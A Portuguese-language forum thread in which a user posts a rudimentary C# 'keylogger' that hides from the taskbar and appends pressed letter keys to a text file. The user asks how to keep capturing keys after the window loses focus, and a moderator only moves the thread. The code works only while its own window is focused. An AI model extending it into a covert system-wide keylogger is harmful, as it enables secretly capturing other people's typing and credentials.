Snuk Postado Julho 3, 2012 Denunciar Share Postado Julho 3, 2012 Bom dia galera beleza ?! =)bom sou novo no forum, e esse dias tenho estudado os codigos de keyloggers.Fiz alguns tal, mas com nenhuma intenção maléfica, apenas para estudos mesmo.enfim fiz ele todo certinho bonitinho, mas notei que tinha algo errado.Vou explicar por partes:1° ele abre tudo fica invisivel, n fica na barra do windows.2° com ele aberto, voce digita e tudo funciona e salva no txt.3° quando voce clica em outro lugar e como se ele tivesse minimizado, e tudo digitado não é gravado. :SSera que alguém pode me ajudar com isso?como faço para que, quando clicar em outro lugar ele continue gravando os caracteres no txt???Agradeço desde já.abraço.Codigo C# abaixo:========================================================================using System; using System.Collections.Generic; using System.Drawing; using System.Windows.Forms; using System.IO; namespace keylog4 { public partial class MainForm : Form { public MainForm() { InitializeComponent(); } void MainFormLoad(object sender, EventArgs e) { } void MainFormKeyDown(object sender, KeyEventArgs e) { StreamWriter sv = new StreamWriter(@"C:\\key.txt",true); if (e.KeyData == Keys.A) { sv.Write("A"); } else if (e.KeyData == Keys.B) { sv.Write("B"); } else if (e.KeyData == Keys.C) { sv.Write("C"); } else if (e.KeyData == Keys.D) { sv.Write("D"); } else if (e.KeyData == Keys.E) { sv.Write("E"); } else if (e.KeyData == Keys.F) { sv.Write("F"); } else if (e.KeyData == Keys.G) { sv.Write("G"); } else if (e.KeyData == Keys.H) { sv.Write("H"); } else if (e.KeyData == Keys.I) { sv.Write("I"); } else if (e.KeyData == Keys.J) { sv.Write("J"); } else if (e.KeyData == Keys.L) { sv.Write("L"); } else if (e.KeyData == Keys.M) { sv.Write("M"); } else if (e.KeyData == Keys.N) { sv.Write("N"); } else if (e.KeyData == Keys.O) { sv.Write("O"); } else if (e.KeyData == Keys.P) { sv.Write("P"); } else if (e.KeyData == Keys.Q) { sv.Write("Q"); } else if (e.KeyData == Keys.R) { sv.Write("R"); } else if (e.KeyData == Keys.S) { sv.Write("S"); } else if (e.KeyData == Keys.T) { sv.Write("T"); } else if (e.KeyData == Keys.U) { sv.Write("U"); } else if (e.KeyData == Keys.V) { sv.Write("V"); } else if (e.KeyData == Keys.Y) { sv.Write("Y"); } else if (e.KeyData == Keys.W) { sv.Write("W"); } else if (e.KeyData == Keys.X) { sv.Write("X"); } else if (e.KeyData == Keys.Z) { sv.Write("Z"); } sv.Close(); } } }======================================================================== Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Durub Postado Julho 5, 2012 Denunciar Share Postado Julho 5, 2012 Vou mover pra área de C#. (.NET)Abraços. Citar Link para o comentário Compartilhar em outros sites More sharing options...
Pergunta
Snuk
Bom dia galera beleza ?! =)
bom sou novo no forum, e esse dias tenho estudado os codigos de keyloggers.
Fiz alguns tal, mas com nenhuma intenção maléfica, apenas para estudos mesmo.
enfim fiz ele todo certinho bonitinho, mas notei que tinha algo errado.
Vou explicar por partes:
1° ele abre tudo fica invisivel, n fica na barra do windows.
2° com ele aberto, voce digita e tudo funciona e salva no txt.
3° quando voce clica em outro lugar e como se ele tivesse minimizado, e tudo digitado não é gravado. :S
Sera que alguém pode me ajudar com isso?
como faço para que, quando clicar em outro lugar ele continue gravando os caracteres no txt???
Agradeço desde já.abraço.
Codigo C# abaixo:
========================================================================
========================================================================
Link para o comentário
Compartilhar em outros sites
1 resposta a esta questão
Posts Recomendados
Participe da discussão
Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.